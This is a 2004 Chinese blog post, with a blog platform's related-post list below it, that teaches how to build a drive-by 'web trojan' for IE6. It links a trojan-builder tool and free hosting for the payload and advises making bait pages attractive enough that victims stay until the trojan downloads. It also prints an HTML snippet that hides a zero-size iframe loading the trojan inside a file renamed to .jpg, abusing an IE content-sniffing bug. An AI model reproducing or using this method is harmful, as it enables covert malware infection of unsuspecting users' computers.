教你做后缀名为jpg的IE6.0网页木马

原创 2004年08月31日 14:24:00
血汉网页木马大家一定很熟悉了,针对各种版本IE都有效的效让
很多朋友都想试一试。但是我看到很多帖子上都说自己苦于找不到
支持ASP的免费空间而苦恼,正好本人手头上有一个,拿出来给大家
分享!

首先送上血汗网页木马的制作工具及动画教程:
url.gifhttp://jdwl.net.cn/qfaq/upload/download/wymm.rar
大家看过以后就会对制作步骤成竹在胸!

ASP免费空间申请地址:url.gifhttp://free.63dns.com/
傻瓜式的操作。非常容易!

不过有一点我要告诉大家,这个空间不允许上传exe文件,想发木马
的朋友还的麻烦一点再申请一个普通空间上传你的单一木马文件!

普通空间申请地址url.gifhttp://www.3322.net/cgi-bin/apply
这里提供的实为收费空间,但有20天左右的免费试用期,相信对每一
个只是想发木马的朋友已经足够!

另外还有一点想补充的是做好的木马并不象作者说的对任何版本都有效
。但是对我自己的电脑却非常有效果,无论网页中加入的是什么EXE文件
,都能够成功的隐藏运行!我用的XP   IE6。0!可我在肉机上远程打开
我的网页。10个人中大概只有5`6个吧!通过屏幕捕获查看对方的电脑,
对方的确是已经打开了我加入了木马的网页!

成功使用网页木马最重要的一点个人经验告诉大家,连接着木马的网页要做
的够吸引人,不一定是豪华,但一定要吸引人,记住。一定要吸引人,要让对方
在你的主页上停留时间达到他的电脑下载木马所需要的时间够长,少一秒都不行,
尤其是你的网页中加入的是象灰鸽子这样大服务端的情况!否则等木马还没有
下载完的时候对方就关闭了你的网页,那就前功尽弃!一切都是白干!

相信大家都有过这样的经历,当你打开了一个不知名的网页,发现里面什么都
没有,或者是极其简陋,就算当时你没有任何的防护心理,你也会随手将其关闭
对不对!
   
成功种植木马不光需要优秀的制作工具,还搀杂着社会工程学和心理学,这点应该
很多人都明白,,这里推荐一款优秀的网页制作工具---东方网页王III  ,傻瓜式
的操作就能够制出精美的网页,网页上的文字和图片
包括多媒体的坐标可以随意定位!不需要你懂的任何HTML语言!所见即所得!
具体下载地址这里就不写上了,大家只要到任何一个搜索引擎里打上--东方网页王III,
很快就能找到一大堆下载地址!

这里送上对我自己非常有效的网页木马地址,供大家参阅,看看
你的电脑是不是和我一样,呵呵 
url.gifhttp://vod520.3322.net/11/068.jpg[已取消里面的EXE文件]
如果有效,结果为你的屏幕左右来回滚动约10秒钟!纯属恶作剧,对系统
无任何危害,,本人以人格担保,里面决无危害他人安全及隐私的内容如
有其他现象发生,您竟可骂娘!。欢迎大家积极点击!

另附:此木马对无盘系统无效。比如有很多网吧就是无盘系统!还有一个就
是对系统没有安装在C盘的无效。如果要有效果。必须修改制作摸板,不建议
你做此尝试!

最后是此篇的精华,请仔细看:一般来说,我们做出来的网页木马地址都是以 htm 或html 结尾!我们可以那这个后缀名修改成 jpg.你知道怎么修改吗,不知道的话请接着仔细看!
不知道大家知道不知道。IE有一个很小的BUG。即只要网站文件里有html码它就会执行,并不理会文件后缀名是什么。

于是我们可以这么来修改网页木马的后缀名,其实说准确一点并不是修改点网页木马的地址后缀名,是利用一个图片地址来打开这个网页木马!

打开记事本写入如下一段代码:
<html>
<iframe src="IE6。0网页木马地址" width="0" height="0" frameborder="0"></iframe>
<center><img src="图片地址"></center>
</html>
然后将其另存为XXX.jpg  。 

剩下的工作就是将这个XXX.jpg图片格式的文件上传的你的空间,给出相对路径让别人访问了!

别人在访问这个XXX.jpg文件时。。浏览器会将文件内的html码执行,根据代码的内容。你的网页木马地址会作为隐藏窗口被打开。。另外那个图片也会出现在对方所打开的网页上!

好了。就到这里。祝大家玩马愉快!

以do为扩展名的网页文件解析

本文转自chinaunix,作者:fucuihong,时间:2015-1-7 1)以do为扩展名的网页文件是java语言写的,以Struts为框架的;它的运行环境是tomcat,weblogic等...
  • L13866
  • L13866
  • 2015年01月07日 16:47
  • 734

图片一句话木马简单制作方法

小白对于制作一句话木马的心得,也是给自己留个印象。
  • TimeOldman
  • TimeOldman
  • 2017年12月01日 23:50
  • 392

IO流_输出指定目录下指定后缀名的文件名称案例

package cn.itcast_08; import java.io.File; /* * 判断E盘目录下是否有后缀名为.jpg的文件,如果有就输出此文件的名称 * * 分析: * ...
  • L1585931143
  • L1585931143
  • 2017年01月20日 23:36
  • 959

图片木马制作的三种方法

1.Copy命令制作 1.asp内容: 打开cmd,数据一下命令: 此时打开两个jpg文件,相比: 且打开2.jpg可以像1.j...
  • whatday
  • whatday
  • 2017年01月25日 21:36
  • 6965

一个Jsp写的木马文件

  • bfboys
  • bfboys
  • 2016年09月10日 17:17
  • 626

网页后缀html、htm、shtml、shtm有什么区别?

每一个网页或者说是web页都有其固定的后缀名,不同的后缀名对应着不同的文件格式和不同的规则、协议、用法,最常见的web页的后缀名是.html和.htm,但这只是web页最基本的两种文件格式,今天我们来...
  • heaven_autumn
  • heaven_autumn
  • 2016年03月18日 09:22
  • 866

BT天堂网站挂马事件后续:“大灰狼”远控木马分析及幕后真凶调查

9月初安全团队披露bt天堂网站挂马事件,该网站被利用IE神洞CVE-2014-6332挂马,如果用户没有打补丁或开启安全软件防护,电脑会自动下载执行大灰狼远控木马程序。 鉴于bt天堂电影下载网站访问...
  • u013474557
  • u013474557
  • 2015年11月09日 14:30
  • 856

怎么利用asp木马取得管理权限

前段时间泛滥成灾的动网论坛上传漏洞以及最近接二连三的各种asp系统暴露的上传漏洞,可能很多朋友手中有了很多webshell的肉鸡,至于选择怎么样这些小鸡的方式也是因人而异,有人继续提升权限,进一步入侵...
  • u012971242
  • u012971242
  • 2013年11月27日 11:51
  • 636

新型浏览器劫持木马“暗影鼠”

近日哈勃分析系统截获了一批新型浏览器劫持木马 “暗影鼠”,该木马通常被打包在压缩包内伪装视频播放器通过网页进行传播。该木马的主要功能是对浏览器访问导航页的流量进行劫持,重定向到自己的推广页,非法获取推...
  • u011672712
  • u011672712
  • 2016年06月01日 23:41
  • 969

木马免杀原理详解(一)

木马免杀原理详解 首先来简单了解一下杀毒软件查杀病毒的原理,当前杀毒软件对病毒的查杀主要有特征代码法和行为监测法。其中前一个比较方法古老,又分为文件查杀和内存查杀,杀毒软件公司拿到病毒的样本以后,定...
  • zhx278171313
  • zhx278171313
  • 2013年12月18日 18:29
  • 1578
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:教你做后缀名为jpg的IE6.0网页木马
举报原因:
原因补充:

(最多只允许输入30个字)